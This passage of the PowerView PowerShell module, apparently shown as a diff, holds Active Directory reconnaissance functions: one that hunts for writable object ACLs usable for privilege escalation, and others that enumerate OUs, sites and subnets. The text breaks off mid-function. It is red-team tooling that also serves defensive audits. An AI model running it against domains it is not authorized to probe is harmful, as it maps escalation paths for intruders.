+ +.EXAMPLE + +Find-InterestingDomainAcl -Domain dev.testlab.local -ResolveGUIDs + +Finds interesting object ACLS in the ev.testlab.local domain and +resolves rights GUIDs to display names. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Find-InterestingDomainAcl -Credential $Cred -ResolveGUIDs + +.OUTPUTS + +PowerView.ACL + +Custom PSObject with ACL entries. +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerView.ACL')] + [CmdletBinding()] + Param ( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('DomainName', 'Name')] + [String] + $Domain, + + [Switch] + $ResolveGUIDs, + + [String] + [ValidateSet('All', 'ResetPassword', 'WriteMembers')] + $RightsFilter, + + [ValidateNotNullOrEmpty()] + [Alias('Filter')] + [String] + $LDAPFilter, + + [ValidateNotNullOrEmpty()] + [Alias('ADSPath')] + [String] + $SearchBase, + + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [ValidateSet('Base', 'OneLevel', 'Subtree')] + [String] + $SearchScope = 'Subtree', + + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, + + [Switch] + $Tombstone, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + BEGIN { + $ACLArguments = @{} + if ($PSBoundParameters['ResolveGUIDs']) { $ACLArguments['ResolveGUIDs'] = $ResolveGUIDs } + if ($PSBoundParameters['RightsFilter']) { $ACLArguments['RightsFilter'] = $RightsFilter } + if ($PSBoundParameters['LDAPFilter']) { $ACLArguments['LDAPFilter'] = $LDAPFilter } + if ($PSBoundParameters['SearchBase']) { $ACLArguments['SearchBase'] = $SearchBase } + if ($PSBoundParameters['Server']) { $ACLArguments['Server'] = $Server } + 
if ($PSBoundParameters['SearchScope']) { $ACLArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $ACLArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $ACLArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $ACLArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $ACLArguments['Credential'] = $Credential } + + $ObjectSearcherArguments = @{ + 'Properties' = 'samaccountname,objectclass' + 'Raw' = $True + } + if ($PSBoundParameters['Server']) { $ObjectSearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $ObjectSearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $ObjectSearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $ObjectSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $ObjectSearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $ObjectSearcherArguments['Credential'] = $Credential } + + $ADNameArguments = @{} + if ($PSBoundParameters['Server']) { $ADNameArguments['Server'] = $Server } + if ($PSBoundParameters['Credential']) { $ADNameArguments['Credential'] = $Credential } + + # ongoing list of built-up SIDs + $ResolvedSIDs = @{} + } + + PROCESS { + if ($PSBoundParameters['Domain']) { + $ACLArguments['Domain'] = $Domain + $ADNameArguments['Domain'] = $Domain + } + + Get-DomainObjectAcl @ACLArguments | ForEach-Object { + + if ( ($_.ActiveDirectoryRights -match 'GenericAll|Write|Create|Delete') -or (($_.ActiveDirectoryRights -match 'ExtendedRight') -and ($_.AceQualifier -match 'Allow'))) { + # only process SIDs > 1000 + if ($_.SecurityIdentifier.Value -match '^S-1-5-.*-[1-9]\d{3,}$') { + if ($ResolvedSIDs[$_.SecurityIdentifier.Value]) { + $IdentityReferenceName, $IdentityReferenceDomain, $IdentityReferenceDN, 
$IdentityReferenceClass = $ResolvedSIDs[$_.SecurityIdentifier.Value] + + $InterestingACL = New-Object PSObject + $InterestingACL | Add-Member NoteProperty 'ObjectDN' $_.ObjectDN + $InterestingACL | Add-Member NoteProperty 'AceQualifier' $_.AceQualifier + $InterestingACL | Add-Member NoteProperty 'ActiveDirectoryRights' $_.ActiveDirectoryRights + if ($_.ObjectAceType) { + $InterestingACL | Add-Member NoteProperty 'ObjectAceType' $_.ObjectAceType + } + else { + $InterestingACL | Add-Member NoteProperty 'ObjectAceType' 'None' + } + $InterestingACL | Add-Member NoteProperty 'AceFlags' $_.AceFlags + $InterestingACL | Add-Member NoteProperty 'AceType' $_.AceType + $InterestingACL | Add-Member NoteProperty 'InheritanceFlags' $_.InheritanceFlags + $InterestingACL | Add-Member NoteProperty 'SecurityIdentifier' $_.SecurityIdentifier + $InterestingACL | Add-Member NoteProperty 'IdentityReferenceName' $IdentityReferenceName + $InterestingACL | Add-Member NoteProperty 'IdentityReferenceDomain' $IdentityReferenceDomain + $InterestingACL | Add-Member NoteProperty 'IdentityReferenceDN' $IdentityReferenceDN + $InterestingACL | Add-Member NoteProperty 'IdentityReferenceClass' $IdentityReferenceClass + $InterestingACL + } + else { + $IdentityReferenceDN = Convert-ADName -Identity $_.SecurityIdentifier.Value -OutputType DN @ADNameArguments + # "IdentityReferenceDN: $IdentityReferenceDN" + + if ($IdentityReferenceDN) { + $IdentityReferenceDomain = $IdentityReferenceDN.SubString($IdentityReferenceDN.IndexOf('DC=')) -replace 'DC=','' -replace ',','.' 
+ # "IdentityReferenceDomain: $IdentityReferenceDomain" + $ObjectSearcherArguments['Domain'] = $IdentityReferenceDomain + $ObjectSearcherArguments['Identity'] = $IdentityReferenceDN + # "IdentityReferenceDN: $IdentityReferenceDN" + $Object = Get-DomainObject @ObjectSearcherArguments + + if ($Object) { + $IdentityReferenceName = $Object.Properties.samaccountname[0] + if ($Object.Properties.objectclass -match 'computer') { + $IdentityReferenceClass = 'computer' + } + elseif ($Object.Properties.objectclass -match 'group') { + $IdentityReferenceClass = 'group' + } + elseif ($Object.Properties.objectclass -match 'user') { + $IdentityReferenceClass = 'user' + } + else { + $IdentityReferenceClass = $Null + } + + # save so we don't look up more than once + $ResolvedSIDs[$_.SecurityIdentifier.Value] = $IdentityReferenceName, $IdentityReferenceDomain, $IdentityReferenceDN, $IdentityReferenceClass + + $InterestingACL = New-Object PSObject + $InterestingACL | Add-Member NoteProperty 'ObjectDN' $_.ObjectDN + $InterestingACL | Add-Member NoteProperty 'AceQualifier' $_.AceQualifier + $InterestingACL | Add-Member NoteProperty 'ActiveDirectoryRights' $_.ActiveDirectoryRights + if ($_.ObjectAceType) { + $InterestingACL | Add-Member NoteProperty 'ObjectAceType' $_.ObjectAceType + } + else { + $InterestingACL | Add-Member NoteProperty 'ObjectAceType' 'None' + } + $InterestingACL | Add-Member NoteProperty 'AceFlags' $_.AceFlags + $InterestingACL | Add-Member NoteProperty 'AceType' $_.AceType + $InterestingACL | Add-Member NoteProperty 'InheritanceFlags' $_.InheritanceFlags + $InterestingACL | Add-Member NoteProperty 'SecurityIdentifier' $_.SecurityIdentifier + $InterestingACL | Add-Member NoteProperty 'IdentityReferenceName' $IdentityReferenceName + $InterestingACL | Add-Member NoteProperty 'IdentityReferenceDomain' $IdentityReferenceDomain + $InterestingACL | Add-Member NoteProperty 'IdentityReferenceDN' $IdentityReferenceDN + $InterestingACL | Add-Member NoteProperty 
'IdentityReferenceClass' $IdentityReferenceClass + $InterestingACL + } + } + else { + Write-Warning "[Find-InterestingDomainAcl] Unable to convert SID '$($_.SecurityIdentifier.Value )' to a distinguishedname with Convert-ADName" + } + } + } + } + } + } +} + + +function Get-DomainOU { +<# +.SYNOPSIS + +Search for all organization units (OUs) or specific OU objects in AD. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainSearcher, Convert-LDAPProperty + +.DESCRIPTION + +Builds a directory searcher object using Get-DomainSearcher, builds a custom +LDAP filter based on targeting/filter parameters, and searches for all objects +matching the criteria. To only return specific properties, use +"-Properties whencreated,usnchanged,...". By default, all OU objects for +the current domain are returned. + +.PARAMETER Identity + +An OU name (e.g. TestOU), DistinguishedName (e.g. OU=TestOU,DC=testlab,DC=local), or +GUID (e.g. 8a9ba22a-8977-47e6-84ce-8c26af4e1e6a). Wildcards accepted. + +.PARAMETER GPLink + +Only return OUs with the specified GUID in their gplink property. + +.PARAMETER Domain + +Specifies the domain to use for the query, defaults to the current domain. + +.PARAMETER LDAPFilter + +Specifies an LDAP query string that is used to filter Active Directory objects. + +.PARAMETER Properties + +Specifies the properties of the output object to retrieve from the server. + +.PARAMETER SearchBase + +The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to. + +.PARAMETER SearchScope + +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +.PARAMETER ResultPageSize + +Specifies the PageSize to set for the LDAP searcher object. + +.PARAMETER ServerTimeLimit + +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. 
+
+.PARAMETER SecurityMasks
+
+Specifies an option for examining security information of a directory object.
+One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.
+
+.PARAMETER FindOne
+
+Only return one result object.
+
+.PARAMETER Tombstone
+
+Switch. Specifies that the searcher should also return deleted/tombstoned objects.
+
+.PARAMETER Credential
+
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
+
+.PARAMETER Raw
+
+Switch. Return raw results instead of translating the fields into a custom PSObject.
+
+.EXAMPLE
+
+Get-DomainOU
+
+Returns the current OUs in the domain.
+
+.EXAMPLE
+
+Get-DomainOU *admin* -Domain testlab.local
+
+Returns all OUs with "admin" in their name in the testlab.local domain.
+
+.EXAMPLE
+
+Get-DomainOU -GPLink "F260B76D-55C8-46C5-BEF1-9016DD98E272"
+
+Returns all OUs with linked to the specified group policy object.
+
+.EXAMPLE
+
+"*admin*","*server*" | Get-DomainOU
+
+Search for OUs with the specific names.
+
+.EXAMPLE
+
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainOU -Credential $Cred
+
+.OUTPUTS
+
+PowerView.OU
+
+Custom PSObject with translated OU property fields.
+#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerView.OU')] + [CmdletBinding()] + Param ( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('Name')] + [String[]] + $Identity, + + [ValidateNotNullOrEmpty()] + [String] + [Alias('GUID')] + $GPLink, + + [ValidateNotNullOrEmpty()] + [String] + $Domain, + + [ValidateNotNullOrEmpty()] + [Alias('Filter')] + [String] + $LDAPFilter, + + [ValidateNotNullOrEmpty()] + [String[]] + $Properties, + + [ValidateNotNullOrEmpty()] + [Alias('ADSPath')] + [String] + $SearchBase, + + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [ValidateSet('Base', 'OneLevel', 'Subtree')] + [String] + $SearchScope = 'Subtree', + + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, + + [ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')] + [String] + $SecurityMasks, + + [Switch] + $Tombstone, + + [Alias('ReturnOne')] + [Switch] + $FindOne, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty, + + [Switch] + $Raw + ) + + BEGIN { + $SearcherArguments = @{} + if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain } + if ($PSBoundParameters['Properties']) { $SearcherArguments['Properties'] = $Properties } + if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase } + if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['SecurityMasks']) { 
$SearcherArguments['SecurityMasks'] = $SecurityMasks } + if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential } + $OUSearcher = Get-DomainSearcher @SearcherArguments + } + + PROCESS { + if ($OUSearcher) { + $IdentityFilter = '' + $Filter = '' + $Identity | Where-Object {$_} | ForEach-Object { + $IdentityInstance = $_.Replace('(', '\28').Replace(')', '\29') + if ($IdentityInstance -match '^OU=.*') { + $IdentityFilter += "(distinguishedname=$IdentityInstance)" + if ((-not $PSBoundParameters['Domain']) -and (-not $PSBoundParameters['SearchBase'])) { + # if a -Domain isn't explicitly set, extract the object domain out of the distinguishedname + # and rebuild the domain searcher + $IdentityDomain = $IdentityInstance.SubString($IdentityInstance.IndexOf('DC=')) -replace 'DC=','' -replace ',','.' + Write-Verbose "[Get-DomainOU] Extracted domain '$IdentityDomain' from '$IdentityInstance'" + $SearcherArguments['Domain'] = $IdentityDomain + $OUSearcher = Get-DomainSearcher @SearcherArguments + if (-not $OUSearcher) { + Write-Warning "[Get-DomainOU] Unable to retrieve domain searcher for '$IdentityDomain'" + } + } + } + else { + try { + $GuidByteString = (-Join (([Guid]$IdentityInstance).ToByteArray() | ForEach-Object {$_.ToString('X').PadLeft(2,'0')})) -Replace '(..)','\$1' + $IdentityFilter += "(objectguid=$GuidByteString)" + } + catch { + $IdentityFilter += "(name=$IdentityInstance)" + } + } + } + if ($IdentityFilter -and ($IdentityFilter.Trim() -ne '') ) { + $Filter += "(|$IdentityFilter)" + } + + if ($PSBoundParameters['GPLink']) { + Write-Verbose "[Get-DomainOU] Searching for OUs with $GPLink set in the gpLink property" + $Filter += "(gplink=*$GPLink*)" + } + + if ($PSBoundParameters['LDAPFilter']) { + Write-Verbose "[Get-DomainOU] Using additional LDAP filter: $LDAPFilter" + $Filter += "$LDAPFilter" + } + + $OUSearcher.filter = 
"(&(objectCategory=organizationalUnit)$Filter)" + Write-Verbose "[Get-DomainOU] Get-DomainOU filter string: $($OUSearcher.filter)" + + if ($PSBoundParameters['FindOne']) { $Results = $OUSearcher.FindOne() } + else { $Results = $OUSearcher.FindAll() } + $Results | Where-Object {$_} | ForEach-Object { + if ($PSBoundParameters['Raw']) { + # return raw result objects + $OU = $_ + } + else { + $OU = Convert-LDAPProperty -Properties $_.Properties + } + $OU.PSObject.TypeNames.Insert(0, 'PowerView.OU') + $OU + } + if ($Results) { + try { $Results.dispose() } + catch { + Write-Verbose "[Get-DomainOU] Error disposing of the Results object: $_" + } + } + $OUSearcher.dispose() + } + } +} + + +function Get-DomainSite { +<# +.SYNOPSIS + +Search for all sites or specific site objects in AD. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainSearcher, Convert-LDAPProperty + +.DESCRIPTION + +Builds a directory searcher object using Get-DomainSearcher, builds a custom +LDAP filter based on targeting/filter parameters, and searches for all objects +matching the criteria. To only return specific properties, use +"-Properties whencreated,usnchanged,...". By default, all site objects for +the current domain are returned. + +.PARAMETER Identity + +An site name (e.g. Test-Site), DistinguishedName (e.g. CN=Test-Site,CN=Sites,CN=Configuration,DC=testlab,DC=local), or +GUID (e.g. c37726ef-2b64-4524-b85b-6a9700c234dd). Wildcards accepted. + +.PARAMETER GPLink + +Only return sites with the specified GUID in their gplink property. + +.PARAMETER Domain + +Specifies the domain to use for the query, defaults to the current domain. + +.PARAMETER LDAPFilter + +Specifies an LDAP query string that is used to filter Active Directory objects. + +.PARAMETER Properties + +Specifies the properties of the output object to retrieve from the server. + +.PARAMETER SearchBase + +The LDAP source to search through, e.g. 
"LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to. + +.PARAMETER SearchScope + +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +.PARAMETER ResultPageSize + +Specifies the PageSize to set for the LDAP searcher object. + +.PARAMETER ServerTimeLimit + +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. + +.PARAMETER SecurityMasks + +Specifies an option for examining security information of a directory object. +One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'. + +.PARAMETER Tombstone + +Switch. Specifies that the searcher should also return deleted/tombstoned objects. + +.PARAMETER FindOne + +Only return one result object. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.PARAMETER Raw + +Switch. Return raw results instead of translating the fields into a custom PSObject. + +.EXAMPLE + +Get-DomainSite + +Returns the current sites in the domain. + +.EXAMPLE + +Get-DomainSite *admin* -Domain testlab.local + +Returns all sites with "admin" in their name in the testlab.local domain. + +.EXAMPLE + +Get-DomainSite -GPLink "F260B76D-55C8-46C5-BEF1-9016DD98E272" + +Returns all sites with linked to the specified group policy object. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainSite -Credential $Cred + +.OUTPUTS + +PowerView.Site + +Custom PSObject with translated site property fields. 
+#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerView.Site')] + [CmdletBinding()] + Param ( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('Name')] + [String[]] + $Identity, + + [ValidateNotNullOrEmpty()] + [String] + [Alias('GUID')] + $GPLink, + + [ValidateNotNullOrEmpty()] + [String] + $Domain, + + [ValidateNotNullOrEmpty()] + [Alias('Filter')] + [String] + $LDAPFilter, + + [ValidateNotNullOrEmpty()] + [String[]] + $Properties, + + [ValidateNotNullOrEmpty()] + [Alias('ADSPath')] + [String] + $SearchBase, + + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [ValidateSet('Base', 'OneLevel', 'Subtree')] + [String] + $SearchScope = 'Subtree', + + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, + + [ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')] + [String] + $SecurityMasks, + + [Switch] + $Tombstone, + + [Alias('ReturnOne')] + [Switch] + $FindOne, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty, + + [Switch] + $Raw + ) + + BEGIN { + $SearcherArguments = @{ + 'SearchBasePrefix' = 'CN=Sites,CN=Configuration' + } + if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain } + if ($PSBoundParameters['Properties']) { $SearcherArguments['Properties'] = $Properties } + if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase } + if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if 
($PSBoundParameters['SecurityMasks']) { $SearcherArguments['SecurityMasks'] = $SecurityMasks } + if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential } + $SiteSearcher = Get-DomainSearcher @SearcherArguments + } + + PROCESS { + if ($SiteSearcher) { + $IdentityFilter = '' + $Filter = '' + $Identity | Where-Object {$_} | ForEach-Object { + $IdentityInstance = $_.Replace('(', '\28').Replace(')', '\29') + if ($IdentityInstance -match '^CN=.*') { + $IdentityFilter += "(distinguishedname=$IdentityInstance)" + if ((-not $PSBoundParameters['Domain']) -and (-not $PSBoundParameters['SearchBase'])) { + # if a -Domain isn't explicitly set, extract the object domain out of the distinguishedname + # and rebuild the domain searcher + $IdentityDomain = $IdentityInstance.SubString($IdentityInstance.IndexOf('DC=')) -replace 'DC=','' -replace ',','.' + Write-Verbose "[Get-DomainSite] Extracted domain '$IdentityDomain' from '$IdentityInstance'" + $SearcherArguments['Domain'] = $IdentityDomain + $SiteSearcher = Get-DomainSearcher @SearcherArguments + if (-not $SiteSearcher) { + Write-Warning "[Get-DomainSite] Unable to retrieve domain searcher for '$IdentityDomain'" + } + } + } + else { + try { + $GuidByteString = (-Join (([Guid]$IdentityInstance).ToByteArray() | ForEach-Object {$_.ToString('X').PadLeft(2,'0')})) -Replace '(..)','\$1' + $IdentityFilter += "(objectguid=$GuidByteString)" + } + catch { + $IdentityFilter += "(name=$IdentityInstance)" + } + } + } + if ($IdentityFilter -and ($IdentityFilter.Trim() -ne '') ) { + $Filter += "(|$IdentityFilter)" + } + + if ($PSBoundParameters['GPLink']) { + Write-Verbose "[Get-DomainSite] Searching for sites with $GPLink set in the gpLink property" + $Filter += "(gplink=*$GPLink*)" + } + + if ($PSBoundParameters['LDAPFilter']) { + Write-Verbose "[Get-DomainSite] Using additional LDAP filter: $LDAPFilter" + $Filter += 
"$LDAPFilter" + } + + $SiteSearcher.filter = "(&(objectCategory=site)$Filter)" + Write-Verbose "[Get-DomainSite] Get-DomainSite filter string: $($SiteSearcher.filter)" + + if ($PSBoundParameters['FindOne']) { $Results = $SiteSearcher.FindAll() } + else { $Results = $SiteSearcher.FindAll() } + $Results | Where-Object {$_} | ForEach-Object { + if ($PSBoundParameters['Raw']) { + # return raw result objects + $Site = $_ + } + else { + $Site = Convert-LDAPProperty -Properties $_.Properties + } + $Site.PSObject.TypeNames.Insert(0, 'PowerView.Site') + $Site + } + if ($Results) { + try { $Results.dispose() } + catch { + Write-Verbose "[Get-DomainSite] Error disposing of the Results object" + } + } + $SiteSearcher.dispose() + } + } +} + + +function Get-DomainSubnet { +<# +.SYNOPSIS + +Search for all subnets or specific subnets objects in AD. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainSearcher, Convert-LDAPProperty + +.DESCRIPTION + +Builds a directory searcher object using Get-DomainSearcher, builds a custom +LDAP filter based on targeting/filter parameters, and searches for all objects +matching the criteria. To only return specific properties, use +"-Properties whencreated,usnchanged,...". By default, all subnet objects for +the current domain are returned. + +.PARAMETER Identity + +An subnet name (e.g. '192.168.50.0/24'), DistinguishedName (e.g. 'CN=192.168.50.0/24,CN=Subnets,CN=Sites,CN=Configuratioiguration,DC=testlab,DC=local'), +or GUID (e.g. c37726ef-2b64-4524-b85b-6a9700c234dd). Wildcards accepted. + +.PARAMETER SiteName + +Only return subnets from the specified SiteName. + +.PARAMETER Domain + +Specifies the domain to use for the query, defaults to the current domain. + +.PARAMETER LDAPFilter + +Specifies an LDAP query string that is used to filter Active Directory objects. + +.PARAMETER Properties + +Specifies the properties of the output object to retrieve from the server. 
+
+.PARAMETER SearchBase
+
+The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
+
+.PARAMETER Server
+
+Specifies an Active Directory server (domain controller) to bind to.
+
+.PARAMETER SearchScope
+
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+.PARAMETER ResultPageSize
+
+Specifies the PageSize to set for the LDAP searcher object.
+
+.PARAMETER ServerTimeLimit
+
+Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
+
+.PARAMETER SecurityMasks
+
+Specifies an option for examining security information of a directory object.
+One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.
+
+.PARAMETER Tombstone
+
+Switch. Specifies that the searcher should also return deleted/tombstoned objects.
+
+.PARAMETER FindOne
+
+Only return one result object.
+
+.PARAMETER Credential
+
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
+
+.PARAMETER Raw
+
+Switch. Return raw results instead of translating the fields into a custom PSObject.
+
+.EXAMPLE
+
+Get-DomainSubnet
+
+Returns the current subnets in the domain.
+
+.EXAMPLE
+
+Get-DomainSubnet *admin* -Domain testlab.local
+
+Returns all subnets with "admin" in their name in the testlab.local domain.
+
+.EXAMPLE
+
+Get-DomainSubnet -GPLink "F260B76D-55C8-46C5-BEF1-9016DD98E272"
+
+Returns all subnets with linked to the specified group policy object.
+
+.EXAMPLE
+
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainSubnet -Credential $Cred
+
+.OUTPUTS
+
+PowerView.Subnet
+
+Custom PSObject with translated subnet property fields.
+#>
+
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+ [OutputType('PowerView.Subnet')]
+ [CmdletBinding()]
+ Param (
+ [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+ [Alias('Name')]
+ [String[]]
+ $Identity,
+
+ [ValidateNotNullOrEmpty()]
+ [String]
+ $SiteName,
+
+ [ValidateNotNullOrEmpty()]
+ [String]
+ $Domain,
+
+ [ValidateNotNullOrEmpty()]
+ [Alias('Filter')]
+ [String]
+ $LDAPFilter,
+
+ [ValidateNotNullOrEmpty()]
+ [String[]]
+ $Properties,
+
+ [ValidateNotNullOrEmpty()]
+ [Alias('ADSPath')]
+ [String]
+ $SearchBase,
+
+ [ValidateNotNullOrEmpty()]
+ [Alias('DomainController')]
+ [String]
+ $Server,
+
+ [ValidateSet('Base', 'OneLevel', 'Subtree')]
+ [String]
+ $SearchScope = 'Subtree',
+
+ [ValidateRange(1, 10000)]
+ [Int]
+ $ResultPageSize = 200,
+
+ [ValidateRange(1, 10000)]
+ [Int]
+ $ServerTimeLimit,
+
+ [ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')]
+ [String]
+ $SecurityMasks,
+
+ [Switch]
+ $Tombstone,
+
+ [Alias('ReturnOne')]
+ [Switch]
+ $FindOne,
+
+ [Management.Automation.PSCredential]
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty,
+
+ [Switch]
+ $Raw
+ )
+
+ BEGIN {
+ $SearcherArguments = @{
+ 'SearchBasePrefix' = 'CN=Subnets,CN=Sites,CN=Configuration'
+ }
+ if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }
+ if ($PSBoundParameters['Properties']) { $SearcherArguments['Properties'] = $Properties }
+ if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }
+ if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }
+ if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }
+ if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }
+ if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+ if
($PSBoundParameters['SecurityMasks']) { $SearcherArguments['SecurityMasks'] = $SecurityMasks }
+ if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }
+ if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }
+ $SubnetSearcher = Get-DomainSearcher @SearcherArguments
+ }
+
+ PROCESS {
+ if ($SubnetSearcher) {
+ $IdentityFilter = ''
+ $Filter = ''
+ $Identity | Where-Object {$_} | ForEach-Object {
+ $IdentityInstance = $_.Replace('(', '\28').Replace(')', '\29')
+ if ($IdentityInstance -match '^CN=.*') {
+ $IdentityFilter += "(distinguishedname=$IdentityInstance)"
+ if ((-not $PSBoundParameters['Domain']) -and (-not $PSBoundParameters['SearchBase'])) {
+ # if a -Domain isn't explicitly set, extract the object domain out of the distinguishedname
+ # and rebuild the domain searcher
+ $IdentityDomain = $IdentityInstance.SubString($IdentityInstance.IndexOf('DC=')) -replace 'DC=','' -replace ',','.'
+ Write-Verbose "[Get-DomainSubnet] Extracted domain '$IdentityDomain' from '$IdentityInstance'"
+ $SearcherArguments['Domain'] = $IdentityDomain
+ $SubnetSearcher = Get-DomainSearcher @SearcherArguments
+ if (-not $SubnetSearcher) {
+ Write-Warning "[Get-DomainSubnet] Unable to retrieve domain searcher for '$IdentityDomain'"
+ }
+ }
+ }
+ else {
+ try {
+ $GuidByteString = (-Join (([Guid]$IdentityInstance).ToByteArray() | ForEach-Object {$_.ToString('X').PadLeft(2,'0')})) -Replace '(..)','\$1'
+ $IdentityFilter += "(objectguid=$GuidByteString)"
+ }
+ catch {
+ $IdentityFilter += "(name=$IdentityInstance)"
+ }
+ }
+ }
+ if ($IdentityFilter -and ($IdentityFilter.Trim() -ne '') ) {
+ $Filter += "(|$IdentityFilter)"
+ }
+
+ if ($PSBoundParameters['LDAPFilter']) {
+ Write-Verbose "[Get-DomainSubnet] Using additional LDAP filter: $LDAPFilter"
+ $Filter += "$LDAPFilter"
+ }
+
+ $SubnetSearcher.filter = "(&(objectCategory=subnet)$Filter)"
+ Write-Verbose "[Get-DomainSubnet] Get-DomainSubnet filter string:
